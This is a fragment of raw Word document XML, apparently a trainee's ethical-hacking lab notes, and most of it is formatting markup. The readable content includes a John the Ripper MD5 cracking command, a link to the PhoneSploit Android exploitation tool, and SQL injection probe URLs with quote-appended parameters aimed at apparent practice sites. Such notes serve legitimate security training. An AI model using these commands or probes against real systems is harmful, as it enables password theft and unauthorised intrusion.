          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="317F918A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt; john --format=raw-md5 hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317F918A" w:rsidP="7D333612" w:rsidRDefault="317F918A" w14:paraId="7F9FECD1" w14:textId="0372DFE1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="317F918A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="4009F01B" w14:textId="5C756375">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="56596EBE" w14:textId="36282B49">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="2452B4DE" w14:textId="6C11C0EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="3A893042" w14:textId="709600F8">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="01930CCC" w14:textId="6B064F27">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="69AC69D1" w14:textId="40E137E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="3D90B42A" w14:textId="56F6CFC1">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="51DDFE16" w14:textId="0F7AB7C1">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB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430462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68f0d8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19ce83e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1146d9b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80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52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24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96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68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40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12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84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560" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="3">
    <w:nsid w:val="b4767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a1297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db14c4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●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○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■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●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DB463FF"/>
    <w:rsid w:val="006BEBEB"/>
    <w:rsid w:val="00E83C5F"/>
    <w:rsid w:val="011B4447"/>
    <w:rsid w:val="01351B76"/>
    <w:rsid w:val="013555D7"/>
    <w:rsid w:val="01417934"/>
    <w:rsid w:val="017680FC"/>
    <w:rsid w:val="02408284"/>
    <w:rsid w:val="02987B20"/>
    <w:rsid w:val="02DD7567"/>
    <w:rsid w:val="03110281"/>
    <w:rsid w:val="0343A679"/>
    <w:rsid w:val="03750B42"/>
    <w:rsid w:val="042204FC"/>
    <w:rsid w:val="04258818"/>
    <w:rsid w:val="04A35859"/>
    <w:rsid w:val="04A76DC0"/>
    <w:rsid w:val="05244EFE"/>
    <w:rsid w:val="05A43421"/>
    <w:rsid w:val="05FEA881"/>
    <w:rsid w:val="07383E63"/>
    <w:rsid w:val="0766184A"/>
    <w:rsid w:val="086BDCD4"/>
    <w:rsid w:val="0928D459"/>
    <w:rsid w:val="09BCB51C"/>
    <w:rsid w:val="0A28FEC7"/>
    <w:rsid w:val="0A5D8525"/>
    <w:rsid w:val="0B9C82A5"/>
    <w:rsid w:val="0BA7B39F"/>
    <w:rsid w:val="0BDA3638"/>
    <w:rsid w:val="0CCA8816"/>
    <w:rsid w:val="0DEEAC09"/>
    <w:rsid w:val="0E72538C"/>
    <w:rsid w:val="0F5D67A2"/>
    <w:rsid w:val="10847D99"/>
    <w:rsid w:val="10E05248"/>
    <w:rsid w:val="1131BA15"/>
    <w:rsid w:val="118A9AEB"/>
    <w:rsid w:val="11C1E201"/>
    <w:rsid w:val="11FF50BD"/>
    <w:rsid w:val="1348729B"/>
    <w:rsid w:val="139D9784"/>
    <w:rsid w:val="1478D5B4"/>
    <w:rsid w:val="14E99A86"/>
    <w:rsid w:val="1590A453"/>
    <w:rsid w:val="15CBF613"/>
    <w:rsid w:val="15FB59CB"/>
    <w:rsid w:val="162B5738"/>
    <w:rsid w:val="1685A1F9"/>
    <w:rsid w:val="17B3C229"/>
    <w:rsid w:val="17CFBB05"/>
    <w:rsid w:val="1821564E"/>
    <w:rsid w:val="186FDBE6"/>
    <w:rsid w:val="19269240"/>
    <w:rsid w:val="192B9C81"/>
    <w:rsid w:val="1979DEF1"/>
    <w:rsid w:val="1A930F3B"/>
    <w:rsid w:val="1AF8FD88"/>
    <w:rsid w:val="1B308485"/>
    <w:rsid w:val="1B680B06"/>
    <w:rsid w:val="1B7137FF"/>
    <w:rsid w:val="1BD17F5C"/>
    <w:rsid w:val="1C15E477"/>
    <w:rsid w:val="1C34F977"/>
    <w:rsid w:val="1C36B2AB"/>
    <w:rsid w:val="1D259E70"/>
    <w:rsid w:val="1DE6E5E3"/>
    <w:rsid w:val="1DFCB09C"/>
    <w:rsid w:val="1EBB04BD"/>
    <w:rsid w:val="200B097C"/>
    <w:rsid w:val="20683F1C"/>
    <w:rsid w:val="2144AACF"/>
    <w:rsid w:val="214E3D13"/>
    <w:rsid w:val="21C560E6"/>
    <w:rsid w:val="22D27FE4"/>
    <w:rsid w:val="2425C3F1"/>
    <w:rsid w:val="24B5E836"/>
    <w:rsid w:val="24C02BC3"/>
    <w:rsid w:val="24CED033"/>
    <w:rsid w:val="24DB3946"/>
    <w:rsid w:val="24E913D7"/>
    <w:rsid w:val="251070BB"/>
    <w:rsid w:val="25E70528"/>
    <w:rsid w:val="2613C18C"/>
    <w:rsid w:val="2629342F"/>
    <w:rsid w:val="263546B8"/>
    <w:rsid w:val="2672D5E7"/>
    <w:rsid w:val="269F8EA4"/>
    <w:rsid w:val="270425C7"/>
    <w:rsid w:val="2753AB21"/>
    <w:rsid w:val="275AFBD1"/>
    <w:rsid w:val="27D41D0B"/>
    <w:rsid w:val="283F896D"/>
    <w:rsid w:val="28B0FAB4"/>
    <w:rsid w:val="28FC228E"/>
    <w:rsid w:val="290CCA1E"/>
    <w:rsid w:val="2916C915"/>
    <w:rsid w:val="29330FAA"/>
    <w:rsid w:val="2961A283"/>
    <w:rsid w:val="29A51E83"/>
    <w:rsid w:val="2A749216"/>
    <w:rsid w:val="2A87E012"/>
    <w:rsid w:val="2AC6F78F"/>
    <w:rsid w:val="2AC7E164"/>
    <w:rsid w:val="2B226293"/>
    <w:rsid w:val="2BD376B7"/>
    <w:rsid w:val="2CBD582F"/>
    <w:rsid w:val="2CDA992F"/>
    <w:rsid w:val="2CE8E79B"/>
    <w:rsid w:val="2D36171F"/>
    <w:rsid w:val="2D52FF6B"/>
    <w:rsid w:val="2DA25D3B"/>
    <w:rsid w:val="2DADBF73"/>
    <w:rsid w:val="2DB463FF"/>
    <w:rsid w:val="2DCB8706"/>
    <w:rsid w:val="2DEC9217"/>
    <w:rsid w:val="2E4CAFCD"/>
    <w:rsid w:val="2E81A8E1"/>
    <w:rsid w:val="2EA1FBDE"/>
    <w:rsid w:val="2EA2CE78"/>
    <w:rsid w:val="2EFD8F9A"/>
    <w:rsid w:val="30FE7B8E"/>
    <w:rsid w:val="3101812E"/>
    <w:rsid w:val="31163449"/>
    <w:rsid w:val="313208C3"/>
    <w:rsid w:val="317F918A"/>
    <w:rsid w:val="31B1544B"/>
    <w:rsid w:val="32294897"/>
    <w:rsid w:val="326A6360"/>
    <w:rsid w:val="33004068"/>
    <w:rsid w:val="3321740B"/>
    <w:rsid w:val="3346F680"/>
    <w:rsid w:val="3354DA43"/>
    <w:rsid w:val="338375FA"/>
    <w:rsid w:val="33E0DA64"/>
    <w:rsid w:val="33EFA04A"/>
    <w:rsid w:val="344A4E30"/>
    <w:rsid w:val="34ACC0B7"/>
    <w:rsid w:val="34F690CF"/>
    <w:rsid w:val="353387C7"/>
    <w:rsid w:val="354D24A7"/>
    <w:rsid w:val="358783F0"/>
    <w:rsid w:val="35C68476"/>
    <w:rsid w:val="36055C9B"/>
    <w:rsid w:val="36BB81A2"/>
    <w:rsid w:val="36C4AC00"/>
    <w:rsid w:val="373E0DE8"/>
    <w:rsid w:val="37514D79"/>
    <w:rsid w:val="37F16A4D"/>
    <w:rsid w:val="380EC9D8"/>
    <w:rsid w:val="38681791"/>
    <w:rsid w:val="389A95A4"/>
    <w:rsid w:val="38C7C267"/>
    <w:rsid w:val="3914B8BB"/>
    <w:rsid w:val="3924617A"/>
    <w:rsid w:val="393A38C7"/>
    <w:rsid w:val="39523F06"/>
    <w:rsid w:val="396998E0"/>
    <w:rsid w:val="398A0309"/>
    <w:rsid w:val="39C00F90"/>
    <w:rsid w:val="3A65862E"/>
    <w:rsid w:val="3AE7296A"/>
    <w:rsid w:val="3B1E67B4"/>
    <w:rsid w:val="3B260DDF"/>
    <w:rsid w:val="3BC98AC7"/>
    <w:rsid w:val="3C0C4FCA"/>
    <w:rsid w:val="3C31F38D"/>
    <w:rsid w:val="3C372D2D"/>
    <w:rsid w:val="3D19AF06"/>
    <w:rsid w:val="3D2AE4A2"/>
    <w:rsid w:val="3D2E5BEA"/>
    <w:rsid w:val="3D998E4D"/>
    <w:rsid w:val="3E5A6BA4"/>
    <w:rsid w:val="3F16C172"/>
    <w:rsid w:val="40100644"/>
    <w:rsid w:val="40219E8E"/>
    <w:rsid w:val="4026436F"/>
    <w:rsid w:val="40B2348D"/>
    <w:rsid w:val="417DD57D"/>
    <w:rsid w:val="4246763E"/>
    <w:rsid w:val="42A9565D"/>
    <w:rsid w:val="4322DB32"/>
    <w:rsid w:val="436ABA5A"/>
    <w:rsid w:val="438ACD8E"/>
    <w:rsid w:val="43F7FCF8"/>
    <w:rsid w:val="442F51B2"/>
    <w:rsid w:val="44507545"/>
    <w:rsid w:val="448A27B8"/>
    <w:rsid w:val="450E93BF"/>
    <w:rsid w:val="453414D3"/>
    <w:rsid w:val="45B78393"/>
    <w:rsid w:val="45F58CF6"/>
    <w:rsid w:val="4672A0E1"/>
    <w:rsid w:val="47C84DCF"/>
    <w:rsid w:val="48652EE5"/>
    <w:rsid w:val="4945A14E"/>
    <w:rsid w:val="4948BC8D"/>
    <w:rsid w:val="495580D4"/>
    <w:rsid w:val="49A30B6A"/>
    <w:rsid w:val="4A78B383"/>
    <w:rsid w:val="4AE81098"/>
    <w:rsid w:val="4B27C9D0"/>
    <w:rsid w:val="4B3EDB9E"/>
    <w:rsid w:val="4B849A98"/>
    <w:rsid w:val="4C58AEAC"/>
    <w:rsid w:val="4D91423B"/>
    <w:rsid w:val="4DC2BE4C"/>
    <w:rsid w:val="4ED7835E"/>
    <w:rsid w:val="4F1815FD"/>
    <w:rsid w:val="4F6E6140"/>
    <w:rsid w:val="503166B4"/>
    <w:rsid w:val="50583F9D"/>
    <w:rsid w:val="51474D44"/>
    <w:rsid w:val="51F02A7C"/>
    <w:rsid w:val="52388F64"/>
    <w:rsid w:val="5257B5AE"/>
    <w:rsid w:val="52CCBC90"/>
    <w:rsid w:val="52D712DE"/>
    <w:rsid w:val="5303B22D"/>
    <w:rsid w:val="530CFA7D"/>
    <w:rsid w:val="53424560"/>
    <w:rsid w:val="54C64C5A"/>
    <w:rsid w:val="55C2F640"/>
    <w:rsid w:val="55EAD69F"/>
    <w:rsid w:val="5612478A"/>
    <w:rsid w:val="56B5FF4A"/>
    <w:rsid w:val="57D8D4BB"/>
    <w:rsid w:val="5878657B"/>
    <w:rsid w:val="59CFF3EC"/>
    <w:rsid w:val="5A40FFAF"/>
    <w:rsid w:val="5A8B60A5"/>
    <w:rsid w:val="5B4D83BD"/>
    <w:rsid w:val="5BB41252"/>
    <w:rsid w:val="5C5AA300"/>
    <w:rsid w:val="5C916298"/>
    <w:rsid w:val="5DCBA0DB"/>
    <w:rsid w:val="5E3883FA"/>
    <w:rsid w:val="5F00CC22"/>
    <w:rsid w:val="6060CD23"/>
    <w:rsid w:val="61CA5C0C"/>
    <w:rsid w:val="6228D03D"/>
    <w:rsid w:val="62683E51"/>
    <w:rsid w:val="62A45837"/>
    <w:rsid w:val="62C68DDC"/>
    <w:rsid w:val="630601CC"/>
    <w:rsid w:val="630BA450"/>
    <w:rsid w:val="63A7CCE5"/>
    <w:rsid w:val="63B51039"/>
    <w:rsid w:val="644E0158"/>
    <w:rsid w:val="64BBEBE1"/>
    <w:rsid w:val="65A47C4F"/>
    <w:rsid w:val="664B1595"/>
    <w:rsid w:val="669841B9"/>
    <w:rsid w:val="66CB518B"/>
    <w:rsid w:val="67266AEB"/>
    <w:rsid w:val="67C18E57"/>
    <w:rsid w:val="6809755E"/>
    <w:rsid w:val="683DAACE"/>
    <w:rsid w:val="68F399E7"/>
    <w:rsid w:val="69BAC179"/>
    <w:rsid w:val="69D8BF9D"/>
    <w:rsid w:val="69FCF3FB"/>
    <w:rsid w:val="6A294CF4"/>
    <w:rsid w:val="6A44993E"/>
    <w:rsid w:val="6A7DC1F1"/>
    <w:rsid w:val="6A914AA7"/>
    <w:rsid w:val="6ADA68AA"/>
    <w:rsid w:val="6B736152"/>
    <w:rsid w:val="6BD12D38"/>
    <w:rsid w:val="6C3D52D5"/>
    <w:rsid w:val="6C85E7A1"/>
    <w:rsid w:val="6CC8CC68"/>
    <w:rsid w:val="6CD9434D"/>
    <w:rsid w:val="6CFD8F50"/>
    <w:rsid w:val="6D129339"/>
    <w:rsid w:val="6D9853A6"/>
    <w:rsid w:val="6EB21F30"/>
    <w:rsid w:val="6F29EE93"/>
    <w:rsid w:val="6F9147CE"/>
    <w:rsid w:val="6FD7E552"/>
    <w:rsid w:val="7043F679"/>
    <w:rsid w:val="704863DA"/>
    <w:rsid w:val="70C9293C"/>
    <w:rsid w:val="7138226A"/>
    <w:rsid w:val="71CF809E"/>
    <w:rsid w:val="7253BDFD"/>
    <w:rsid w:val="72F67A48"/>
    <w:rsid w:val="739EA62D"/>
    <w:rsid w:val="747C474B"/>
    <w:rsid w:val="74D9F5ED"/>
    <w:rsid w:val="74E33381"/>
    <w:rsid w:val="753E0BEE"/>
    <w:rsid w:val="75996D0F"/>
    <w:rsid w:val="76E1D71E"/>
    <w:rsid w:val="77105147"/>
    <w:rsid w:val="77470346"/>
    <w:rsid w:val="77D2A14B"/>
    <w:rsid w:val="79D6596E"/>
    <w:rsid w:val="79E6E835"/>
    <w:rsid w:val="79F68A92"/>
    <w:rsid w:val="7A9A9D5A"/>
    <w:rsid w:val="7B17A032"/>
    <w:rsid w:val="7B31DF37"/>
    <w:rsid w:val="7BA1BC14"/>
    <w:rsid w:val="7D333612"/>
    <w:rsid w:val="7E6123B8"/>
    <w:rsid w:val="7EB93EDF"/>
    <w:rsid w:val="7ECEF4DB"/>
    <w:rsid w:val="7F2D72FB"/>
    <w:rsid w:val="7F8D2401"/>
    <w:rsid w:val="7F8F0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463FF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{04E1C597-B525-4642-B4E1-79EC863AD82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5B4D83BD"/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:uiPriority w:val="34"/>
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="5B4D83BD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cyberciti.biz/faq/howto-find-a-directory-linux-command/" TargetMode="External" Id="R875d652d96c147b6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aerosol-can/PhoneSploit" TargetMode="External" Id="R17893e5ca7284ede" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R59c6f4ae7f664ad9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intezer.com/blog/elf-malware-analysis-101-initial-analysis/" TargetMode="External" Id="Rb359dade531f470a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R21c942cc9ffc4536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R7918a1469fa94a68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R39e530bce8104a9f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="Rb66dbb22b12c4b2b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Rdfdbec5ba19741ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://emn178.github.io/online-tools/crc/" TargetMode="External" Id="R4b068961ba8d448f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cinema.cehorg.com/search.php?q=test%22" TargetMode="External" Id="R957c501382874c08" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cinema.cehorg.com/search.php?q=test%22" TargetMode="External" Id="R5c4082855cc54c3c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cinema.cehorg.com/search.php?q=test%22" TargetMode="External" Id="Rd75eb94d70dc4c7e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cinema.cehorg.com/search.php?q=test%22" TargetMode="External" Id="R5fd882039b7543b1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cinema.cehorg.com/search.php?q=test%22" TargetMode="External" Id="R8c4cad61b83f4a4b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/viewprofile.aspx?id=1%22" TargetMode="External" Id="R364b54b34adc42e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/viewprofile.aspx?id=1%22" TargetMode="External" Id="R52430ccb193b492e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/viewprofile.aspx?id=1%22" TargetMode="External" Id="Rf5ae457dd917472d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rdb54e82f05d1468f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Re2f7a45ff02141ce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R024cce597cfd4d0f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tunnelsup.com/hash-analyzer/" TargetMode="External" Id="R9822392dfc5b48e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2025-05-15T09:30:57.1014646Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-21T07:59:30.2073666Z</dcterms:modified>
  <dc:creator>Rafiea Nusrat Mim</dc:creator>
  <lastModifiedBy>Rafiea Nusrat Mim</lastModifiedBy>
</coreProperties>
</file>